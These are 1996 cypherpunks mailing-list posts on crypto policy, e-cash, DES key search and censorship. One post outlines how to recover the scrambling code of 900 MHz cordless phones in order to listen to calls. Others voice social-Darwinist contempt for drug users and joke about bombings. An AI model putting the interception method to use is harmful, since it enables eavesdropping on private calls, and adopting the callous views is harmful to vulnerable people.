>a variation of DES in the encryption (according to the authors).  An
>Italian archiver called CODEC also uses DES.  PGP gets more publicity than
>any crypto product around (CNN, NPR, Pacifica, NYTimes,  etc.) and will
>likely get bigger as time goes on and as the arguments over escrow proposals
>get louder.  MS's C[r]API and Netscape also make people more aware of
>strong crypto...

None of these are mass market software in the sense I discussed. Mass
market products are generally known as "productivity applications". Even
PGP, which has a certain following, doesn't do anything but encryption etc.
on its own. It's not a word processor like Microsoft Word, mail program
like Eudora, or shared data base cum mail system like Lotus Notes. Those
are the mass market applications generating huge volumes of readable
traffic of value. As for Netscape (and its mailer), it complies with ITAR.
Thus your rejoinder is irrelevant and non-responsive.

...

>
>Doesn't counter my question/argument.  Serious criminals with a few
>braincells who care about wiretapping or protecting their files from
>the authorities will  obviously not use anything that the government
>can read.

Let those who passed basic English use the skills they were taught. Freeh
said, and I repeated, that the system wasn't designed to prevent determined
criminals from using robust crypto.

>
>Even a ban on unescrowed crypto worldwide will not help.  Every copy
>of strong crypto software will not magically disappear upon the
>signing of such treaties and laws.

You are either dense or obfuscating. The point has now been made repeatedly
that the issue isn't the disappearance of stand-alone niche crypto, but
prevention of robust, built-in, unescrowed crypto, transparently usable in
exported copies of Microsoft Word, Netscape, Eudora, etc. Read the previous
sentence until you understand it.

<Rest of repetitive and off-topic matter omitted.>

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Tue, 30 Jul 1996 04:32:48 +0800
To: cypherpunks@toad.com
Subject: Re: Internet blamed for pipe bombs
In-Reply-To: <v02120d19ae2131a3ee0b@[192.0.2.1]>
Message-ID: <31FCEB4D.401B@frb.gov>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 5:36 7/28/96, E. ALLEN SMITH wrote:
> 
> >>   Across the country, latest figures from the U.S. Bureau of Alcohol,
> >>   Tobacco and Firearms show a 20 percent jump in pipe bomb incidents
> >>   between 1990 and 1994.
> >
> >[...]
> >
> >>   "We've been incredibly busy," said sheriff's bomb technician Judd
> >>   Holiday. "As crime in other categories is dropping, this is going up."
[...]
> I would like offer another
> possible explanation for the increase in pipe bombings. The People are
> getting frustrated and a pipe bomb can be very useful device releasing
> one's frustration.
> 
> [No, I do not approve of pipe bombing civilians].

Well, the statistic itself is pretty meaningless without some context.
There may have been a "20 percent jump" between '90 and '94, but at
what rate had pipe bomb "incidents" been growing BEFORE that?

-- 
rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Tue, 30 Jul 1996 04:24:23 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607291702.NAA03342@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


> Jim Choate <ravage@einstein.ssz.com> writes:

> You want a continuous Fourier transform, not a discrete one, to
> determine the frequency spectrum of the waveform being sampled.
> The FFT is simply an algorithm for computing the DFT without
> redundant computation.  In general, any Lebesgue integrable
> complex function will have a Fourier transform, even one with a
> finite number of discontinuities. The reverse transform will
> faithfully reproduce the function, modulo the usual caveats about
> function spaces and sets of measure zero.
> 
Well of course!  My thoughts exactly.  Great minds think alike.

Now, would you mind doing a little translation (for the laymen), 
since I didn't understand?

I appreciate it,

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 30 Jul 1996 06:04:27 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: what's a weapon? (fwd)
Message-ID: <199607291733.NAA02778@nrk.com>
MIME-Version: 1.0
Content-Type: text


------- Forwarded Message
====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 16       July 28, 1996        Carl Landwehr, Editor
                                        Hilarie Orman, Assoc. Editor
====================================================================

...

Drawing an analogy with encryption and US ITAR, a poster reported that
A piper is being taken to court for practicing on Hampstead Heath,
which has a by-law forbidding music. Mr Brooks, the piper, has denied
the charge. He claims he wasn't playing a musical instrument, but
practicing with a weapon. In 1746 in England, bagpipes were declared to
be instruments of war, not musical weapons, and a subsequent Act of
Parliament specifically stated that they were weapons.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 29 Jul 1996 19:54:33 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: e$: The Demographic "Transaction" (was Re: Schelling Points...)
Message-ID: <1.5.4.32.19960729084343.00330008@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 15:09 28/07/96 -0400, Robert Hettinga wrote:

>
>He said there are many hypotheses about what causes this decline in
>fertility, including the commonly held one that people make babies as a
>form old age pension income :-)

That's true: when the state does not provide old-age pension,
that's the only alternative, and surely not a bad one. 

>He also said that the obvious things like public health and education were
>good ways to increase life expectancy, but that the very best way to cause
>this "demographic transition" was a dramatic increase in personal income.

As I see it, having more children makes sound economic sense when
you have child labor. You feed the child for 4-5 years, after
which it contributes financially to the family for the rest of
its short life. More stringent enforcement of anti child-labor
legislation would help. Increase in life expectancy is also good,
because then you need fewer children as insurance.

The spread of the Internet, and the ability to post anonymously
should help in exposing instances of violation of child-labor
laws, and increasing outrage. Hopefully, it will also make it
easier to spread literacy, which is arguably the best way to keep
population down.

I'd really like to know who this "he" is whom Robert is citing.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 29 Jul 1996 19:54:25 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
Message-ID: <1.5.4.32.19960729084347.00331d14@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 05:15 24/07/96 -0500, Matt Carpenter wrote:

>getting change from the merchant.  Ian Goldberg pointed out that
>with the current ecash protocol, accepting change not only eliminates your
>anonymity, but that you also have to go online to make sure you aren't being
>cheated.

I'm sure it should be possible for the merchant to electronically
give you an "IOU" for the amount of change s/he owes you, no
matter how small, without loss of your anonymity. Next time you
go to the same merchant, the IOU could automatically be adjusted
against the new purchase.
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Tue, 30 Jul 1996 06:23:15 +0800
To: cypherpunks@toad.com
Subject: Re: Questions...
In-Reply-To: <so4qRD1w165w@bwalk.dm.com>
Message-ID: <96Jul29.145711edt.20482@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <so4qRD1w165w@bwalk.dm.com>, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:

    > Alan Horowitz <alanh@infi.net> writes:
    >> > Hello, I would rather I not be too blunt, but despite my generous
    >> interest in computer > hacking cracking, and other such related topics, I
    >> have come to be confused by the > mailer, can I ask any questions that I
    >> wish, or am I limited by some type of header > subject?
    >> 
    >> 
    >> 
    >> Shaun, let me explain. There's a committee of seven people. Me, Tim May,
    >> David Sternlight, some assination-politics guy, some guy named Vultis or
    >> somesuch, and so on.
    >> 
    >> Only if we're in unanimous agreement on the outcome of an issue, may you
    >> start a thread on a new topic. which then continues till the first
    >> posting which calls someone a Nazi.

    > No, no, this is all wrong. There's a guy named Lance Deitweller and he has
    > fun posting as different people and posting under different names. Sometimes
    > Lance's different personalities (he calls them "tentacles") even argue with
    > one another!

    > These posters have been definitevely shown to be Lance's tentacles:
    > Alan Olsen (Lance posing as friend of vegetables)
    > "Dr." David Sternlight
    > Igor Chewed-Off
    > Jim Bell (talk.politics.assassination)
    > Black Unicorn
    > "Tim May" (Lance is pretending to be senile)
    > Vladimir Z. Nuri (Lance's parody of a Brighton Beach Sovok)

You forgot:
	Dr. Dimitri Vulis (Rabid spewer of flames about someone/something
involving wheelchairs and vegetables, as though carrots, or any other
vegetable, use wheelchairs, but no-one really knows what this branch
of Lance is talking about, nor wants to.  This particular tentacle
somehow manages to make reference to its favorite imaginary topic in
every messaage it writes on any topic whatsoever.  Also, never mispell
its name.)


-Robin

PS: For the record, I find that Dimitri often has interesting things
to say.  I just wish he'd stop talking about wheelchairs and
vegetables.  Makes me get sad (I broke my back and almost ended up in
a wheelchair, but I'm much better now) and hungry (I'm a vegetarian)
at the same time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Tue, 30 Jul 1996 06:32:02 +0800
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: "privatizing" phones?
In-Reply-To: <2.2.32.19960729151349.006e8264@mail.pb.net>
Message-ID: <rogerybk2lskz.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Geoffrey C Grabow <gcg@pb.net> writes:

  > The key doesn't need to be found in real time!  You can always
  > record the call and decrypt it later.  If the information deals
  > with an event in the future, you could have plenty of time to
  > crack it.
 
US 900 MHz digital cordless phones use MSK modulation on one of 40
channel pairs at 902.59-903.59 and 926.59-927.59 MHz.  Privacy is
achieved by XORing a PN sequence with the CODEC data.  The sequence
offset is determined by a 16-bit code derived from the base unit's
serial number (handset's codes are programmed when placed in the base
unit).

Simple scrambling, not any "encryption" worthy of the name.

A little experimentation with a cordless phone, a scanner with an MSK
demodulator, a sound board, and some simple code to capture serial
data on your computer's printer port would yield all of the frame
information you need, and could then be used to capture real-world
data for analysis.  

Post-processing of the captured data would yield the scrambling code
in a matter of a day or so, and then you'd have the code for that
target phone.

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 30 Jul 1996 10:05:11 +0800
To: Scottauge <Scottauge@aol.com>
Subject: Re: Just some comments on what I've read here
Message-ID: <9607292227.AA22099@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Sure, we'll just set up our own [i/I]nternet...(We need
a letter between upper and lower case...)

It won't be that expensive...lesse....my WAN, for about 5000
people and 15000 machines, only runs me about $400,000 US
per month.  That's just circuit charges, of course... doesn't 
include any of the networking equipment or cost of the
machines....is this a troll or what?

     Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: Scottauge @ aol.com @ smtp
Date: 07/28/96 04:39:39 PM
Subject: Just some comments on what I've read here

1) Seems to be some excitment about banning information on the internet
here...

Setting up a set of computers for a private net is not that big a deal (just
some money involved and with the availability of Linux - a UNIX variant - for
free make it hardware and telephone costs.)  Do it for companies all over
(hence the aol address - just a local phone call from anywhere!) and it works
just fine.

So if people want to play by different rules.. it's possible.  Think of it as
a members only social club.  (I can make computers real hard to get into, but
social engineering kicks my butt all the time.)

2) Whats wrong with America?

I've been leaning towards Libertarian for some time now.  Voted for Ross last
time as a message I ain't happy with how things are going over there.  Likely
gonna vote Harry Brown - my first vote for a Libertarian.  (He is seems to
have it together versus the others) - but hey, gettin off the subject
here....

Seems we are no longer United in these United States...

A stranger is not a potential friend or ally but a potential robber, baby
raper... you fill in the blank.  We're all scared of each other!

Something has been happening where rich are pitted against the poor, the
working against the non-working, races vs other races.  Is it a conspiracy as
some of my friends who look for black helicopters say, or a natural reaction
of politicians and "leaders" seeing a formula that works and then
implementing it.

To much Hard Copy and Extra reporting out there too.  I don't give a rat's
a*s about most of the sh*t their putting out (censorship mine for those with
delicate eyes).  But US culture has become very valuable and ya gotta get
them foreign markets ya know.

There was a time when a famil could have a picnic on the white house lawn.
 Then it got gated, now the street is closed.  Our leaders seem to be no
longer among us.

But it doesn't matter.  Some beuracrat (sp) gets a bug up their butt to give
you trouble, your f*cked.  With a seconds thought and a signature on a peice
of paper ya can have your land gone or your bank account cleared or you name
it.  One second and on to the next thing as far as they are concerned.  Can
we impeach them? Can we vote for someone else next time?  They're a buffer
between the ones we can give trouble too.

Plus Laws are so damn big these days.  It takes a ream of paper (sometimes a
whole 3000 page box of paper) to print these things out.  You can bet the
leg. not reading these things!  They got advisors to read over sections and
say this is good, this is bad.  The real representatives and senators are out
looking for campaign money.  So damn, I now speculate these guys and gals are
letting the advisors put the laws together - again someone not answerable (or
even known) to the public.

So now, you got legislators not reading the bills they are working on and
there is a whole army of serfs ready to make some regulations that are in
effect the same as law and ready to start looking for people to bother so
they can look busy - and these serfs are not answerable to the public.

Sorry, but congress is a part time job as far as I'm concerned.  These laws
are the result of people with nothing to do.

I listen to the TV set and I hear "Oh we gotta law comin to fix this".
 Bullsh*t.  There are plenty of other laws out there to hassle trouble makers
with.  They didn't nab Capone on murder, but on tax evasion.  People fix
stuff, not laws.  Somebody is measuring their prouctivity by the amount of
paper they can spew out of their office.

3) I'm a keen believer in Social Evolution

A quick definition:  If your a drug addict and your stupid enough to OD, you
deserve to die.

Another example: Your a drug dealer and ya get shot - oh well.  Goes with the
choice , dude.

We keep protecting people from their choices.  We think we are doing a favor
for ourselves but I POSTULATE we are not.

We keep on fightin nature and it just ain't possible.  There just might be a
reason for this weedin out process.  But I'll admit it - I have a prejudice
against stupid people - not mentally hadicapped, but stupid people.

Well, thanks for reading my ranting and raving....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Jul 1996 09:53:54 +0800
To: Steve Reid <cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
Message-ID: <199607292231.PAA12201@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:28 AM 7/24/96 -0700, Steve Reid wrote:
>On the subject of choosing keys randomly, rather than dividing up the
>keyspace... 
>
>This seems like a very good idea to me.
>
>One potential problem is actually choosing the random keys. Have to be
>able to get entropy at a fast rate, and/or use a good PRNG.

I think you chose your starting place in the key space and then proceed
sequentially from there.  However, if it turns our that gray code
increments of the key can reduce the key setup time, then you would want to
use that ordering of the key space for the "next" key to try.

Another possibility is to work in randomly chosen blocks of 1000 to
1,000,000 or so keys.  This approach would reduce the cost of getting good
random numbers to manageable levels.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 30 Jul 1996 06:53:18 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Feinstein wants controls on Internet, Books
Message-ID: <v0151010aae22d08b4c0e@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Feinstein today introduced an amendment revisiting her 1995 net-censorship
amendment tacked onto the anti-terrorism bill. Seeks to ban bomb-making
info from the Net and is being marketed in those words, but is not
Net-specific.

-Declan


>One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
>controls on information put on the Internet, on censorship of books and
>articles describing how pipe bombs work, and for making it easier to get
>wiretaps against those suspected of committing thought crimes.
>
>One or two more major incidents on top of the recent ones (World Trade
>Center, Oklahoma City, Dharan, TWA 800, and Olympic Village) and I suspect
>Congress will simply vote to repeal the Bill of Rights and just be done
>with this whole experiment in liberty.
>
>--Tim May
>
>Boycott "Big Brother Inside" software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 30 Jul 1996 01:22:41 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <199607282209.PAA08400@mail.pacifier.com>
Message-ID: <31FCC299.59E2B600@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> At 01:45 PM 7/28/96 -0700, Bill Stewart wrote:
> 
> >For instance, say you, hypothetically, wanted to blow up your government's
> >legislative building.  You'd obviously want to pick a dark and stormy night,
> >say early in November, and you'd sneak into the basement with barrels
> >of gunpowder.  You'd use a long, slow-burning fuse, so it would blow up
> >the next day when they're in session, but after lighting it you'd still
> >run away very fast just in case your fuse speeds up on you.  The obvious
> >thing you'd need to do is to NOT GET CAUGHT LIKE THE LAST FOOL WHO TRIED IT.
> >However, if you do get caught, maybe you'll end up with your name in lights
> >and people will set off firecrackers in your honor every fall,
> >while if you don't get caught you won't be personally famous. Tough choice:-)
> >
> >Penny for the Guy?
> 
> Fawke You!

I used to have a T-shirt that read:

	"Guy Fawkes - the only person to enter
	Parliament with honest intentions"

Crypto relevance?  T-shirts perhaps?

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 30 Jul 1996 07:50:05 +0800
To: cypherpunks@toad.com
Subject: CBO study of electronic payment systems now on Web
Message-ID: <v03007603ae22c97ed063@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Mon, 29 Jul 1996 15:16:31 -0400
From: PHILIP WEBRE <philipw.nrd@cbo.gov>
To: rah@shipwright.com
Subject:  CBO study of electronic payment systems now on Web

The new Congressional Budget Office study on electronic payment systems (ASCII
or Word Perfect Formats available) is now available at:

gopher://gopher.cbo.gov:7100/1

The Executive Summary Follows:


                                                      July 1996


         EMERGING ELECTRONIC METHODS FOR MAKING RETAIL PAYMENTS


Financial intermediaries such as banks and credit card companies are
developing products that will enable consumers and businesses to pay
for retail, or small-dollar, purchases electronically.  Increasingly
cheaper computing power and advances in data communications technology
have made those new payment methods possible.  The Congressional Budget
Office (CBO) study Emerging Electronic Methods for Making Retail
Payments examines the effect the new forms of payment will have on the
market for retail payments and the issues they will raise for federal
policy.

  The two primary types of payment being advanced for use in retail
purchases are prepaid stored-value cards and on-line payments made with
personal computers through the Internet.  Stored-value cards will function
much like prepaid mass transit or phone cards but could substitute for
cash in small-dollar purchases.  Payments proposed for use over the Internet
will include both familiar and new methods.  Familiar methods use existing
credit cards and checking accounts that are suitably modified for secure
on-line use.  Breaking new ground, several companies have proposed or issued
types of on-line scrip, which essentially functions like privately issued
traveler's checks.

  This study assesses the market potential for stored-value cards and
on-line payments by analyzing both the current use of cash in the economy
and the specific markets commonly cited as likely candidates for such payment
methods.  An eventual market for stored-value cards of $20 billion yearly is
not inconceivable but will develop gradually.

  The introduction of electronic payment methods raises a number of policy
issues.  Existing laws and regulations, for example, do not clearly cover
some of the new methods, or cover them only under certain circumstances.
Questions arise as to whether the balances of stored-value cards and on-line
scrip will be covered by deposit insurance or be subject to reserve
requirements, and whether consumers will be protected by current regulations
that limit liability for unauthorized use of credit cards and electronic
fund transfers.  Even in areas that existing laws cover--such as antitrust
policy and law enforcement against money laundering, fraud, and tax
evasion--applying and enforcing those laws may be more difficult.

  Two major concerns are the effect of the new payment methods on monetary
policy and the effect of having nondepository institutions issue them.
Issuance by firms other than federally regulated depository institutions
raises competitive issues and concerns about the safety and soundness of the
financial system.  Given the expected small size of the market for electronic
payments, however, monetary policy and the financial system are unlikely to
be seriously affected.

  Questions about the study should be directed to Judith Ruud or Philip Webre
of CBO's Natural Resources and Commerce Division at (202) 226-2940.  The
Office
of Intergovernmental Relations is CBO's Congressional liaison office and can
be reached at 226-2600.  For additional copies of the study, please call the
Publications Office at 226-2809.




--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Tue, 30 Jul 1996 07:33:56 +0800
To: cypherpunks@toad.com
Subject: Re: "Soft Targets" as Schelling Points
In-Reply-To: <+cmu.andrew.internet.cypherpunks+olybBWW00UfAA10EF9@andrew.cmu.edu>
Message-ID: <199607292005.NAA08697@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
>The connection should be clear, but in case it is not: many soft targets
>are Schelling points for terrorist actions.

I see no coordination problem here.  Schelling points are a useful
concept when you have several actors, each of whom benefits from
making the same choice as the others.  Here, I think you want to say
"soft targets are easy to attack".

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rod@wired.com (Roderick Simpson)
Date: Tue, 30 Jul 1996 10:09:42 +0800
To: cypherpunks@toad.com
Subject: Denning vs. Gilmore
Message-ID: <v02140b09ae2281f8f878@[204.62.132.248]>
MIME-Version: 1.0
Content-Type: text/plain


Today, Monday, July 29, Dorothy Denning begins her debate vs. John Gilmore
over The Absolute Right to Privacy on Wired Online's Brain Tennis site. Do
citizens of the world have an "unalienable right" to privacy - or are there
reasons why governments ought to have access to our communications? This
debate will run daily through August 7. Follow along at
http://www.wired.com/braintennis/. To get into the debate yourself, go to:

http://www.hotwired.com/cgi-bin/interact/replies_all?msg.21655

An excerpt of Dorothy's first post today:

     "I'm not ready to accept 'the cat is out of
     the bag.' Let's look for a way of enjoying
     the benefits of encryption without
     unnecessarily hindering the ability of law
     enforcement to perform its mission. Let's
     use encryption for privacy, but also give
     law enforcement access to communications and
     computer files when there is probable cause
     and a judge has issued a court order. In
     some cases, that access must be
     surreptitious. Imagine the FBI calling a
     family boss and saying 'Give me your keys so
     I can wiretap your phone!'"

John Gilmore's first post follows tomorrow. See you there.

Best,
Roderick Simpson
rod@wired.com
Wired Online







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 30 Jul 1996 10:31:57 +0800
To: Scottauge <Scottauge@aol.com>
Subject: Re: Just some comments on what I've read here
Message-ID: <9607292315.AA23622@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


And my point is that you obviously have no 
clue about running a sizeable net.  It looks like you
are trying to propose Fidonet.  Go ask one
of them how much it costs for them to run
a node.

Any sort of dialup service is pretty much going to
limit you to store-and-forward items.  Any full-time
links attempting to mesh "a few thousand" 
users is going to quickly exceed my paltry $400K.

You might want consider using the main Internet, 
and looking into encryption...

    Ryan

---------- Previous Message ----------
To: Ryan.Russell, cypherpunks
cc: 
From: Scottauge @ aol.com @ smtp
Date: 07/29/96 06:49:45 PM
Subject: Re: Just some comments on what I've read here

In a message dated 96-07-29 18:28:06 EDT, you write:

> It won't be that expensive...lesse....my WAN, for about 5000
>  people and 15000 machines, only runs me about $400,000 US
>  per month.  That's just circuit charges, of course... doesn't 
>  include any of the networking equipment or cost of the
>  machines....is this a troll or what?
>  
I dunno, are you a nob?

As I recall I said the expenses where going to be in the switches (or public
networks).

Plus I'm thinking the most basic services of telnet, ftp, smtp, and some
nnp...

Plug two network boards (whether ethernet or X.25 or ATM) into a UNIX
computer and you have a router.

You cannot tell me that hardware (minus the hardcore ATM/X.25 stuff) is not
inexpensive enough to put something together.  At least for a few thousand
users all sophisticated enough to know how to install a UNIX or Linux
system... I'm talking about a club here - not a replacement for the internet.

Open up your mind, dude....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 30 Jul 1996 10:08:01 +0800
To: sparks@bah.com (Charley Sparks)
Subject: Re: A Libertine Question
In-Reply-To: <2.2.32.19960729122101.0069c538@pop1.jmb.bah.com>
Message-ID: <960729.164258.3K8.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, sparks@bah.com writes:

> In the event that drugs are legalized like alcohol ( also a drug
> ) and tobacco and cafeine, who will take responsibility for
> housing and feeding those, who are now blameless, individuals
> who can't or won't take responsibility for themselves and work
> or whatever.

I vote for "nobody".  I firmly believe that those who will not accept
responsibility for themselves are best removed from the gene pool
(preferably before they have the opportunity to breed).

> With freedom and liberty come a lot of
> responsibility. Too many people today balme every damn thing in
> the world for their problems -  and get away with it....

That they are allowed to "get away with it" is a _big_ problem.  But the
typical 'liberal' solutions to social problems seem (at least to me) all
centered around disallowing failure.  Thus the "hapless drug victim"
must be coddled and supported by society (at our expense, of course),
lest they experience discomfort.

I like to point out that evolution always requires multiple generations,
and that when nothing dies, nothing evolves.  This means, of course,
that the liberal money-throwers are unlikely to ever see their
"benevolence" produce a good result, even if said benevolence _could_
produce improvements.  And while offering up the public teat may help in
certain limited and individual cases, it generally only weakens the
resolve of the suckler to improve hir situation.

Failure should _never_ be disallowed or legislated away.  It's the
single most important contributor to evolution (animal or social).

OBDisclaimer: As a matter of fact, I _am_ a Social Darwinist.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf0z1Bvikii9febJAQHsWgP/dPHNz1RfHBDobkpDpb7w9sibX7y0i07h
Dk1cBPMmUGMik3d6h+0PMRExecVUkeQnzR/Hsbd0bws97IBfuB1QSTwpzKo/VuD9
VUO1iA61zGlNJGO/Lm2Pd3RmFj+c0ko4Fi6kChmeUY38xszbj1PBnvp9KZc+Ahs5
KYBMlgvbI2w=
=CN0F
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Tue, 30 Jul 1996 08:20:48 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Secure drive?
Message-ID: <2.2.32.19960729205856.0068b428@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 07/29/96 -0700, Alan Olsen wrote:
>At 11:31 AM 7/29/96 -0400, you wrote:
>>Greetings all,
>>  Does anyone know if the 1.4a version works correctly with Win95?  If not,
>>is there an updated version?  If not, will there be one anytime soon?  If
>>not, will PGPLIB (aka PGP3.0) provide a similar function?  If not... heck!
>
>My understanding is that is does.  I need to test if the new version also
>works with the Zip Drive.  (It used to not, but it was supposed to get
fixed...)
>
>I will be trying it soon and will post my results to the list...
>
>
I assume that when you say that "it does", this means that I can access the
encrypted drive from Win95.  If so, can you tell me how.  I have a 50mb
partition that's encrypted and if I boot to DOS everything works perfectly,
but from Win95, the drive is always encrypted.  I've tried entering my
passphrase prior to Win95 loading... no effect.  If I try to enter my pp
from a DOS box, it says that the SECTSR isn't loaded, but MEM says that it
is.  Any thoughts?
 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |          PGP 2.6.2 public key available at www.pb.net/~wizard        | 
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 30 Jul 1996 08:46:18 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: 2nd CDA decision in....
Message-ID: <199607292134.RAA03705@nrk.com>
MIME-Version: 1.0
Content-Type: text



Just heard:

Us folks 2, Ralph Reed & the Thought Police, 0.
-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 30 Jul 1996 10:48:59 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: A Libertine Question
In-Reply-To: <9606298386.AA838689552@smtplink.alis.ca>
Message-ID: <31FD44F0.26C1@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:

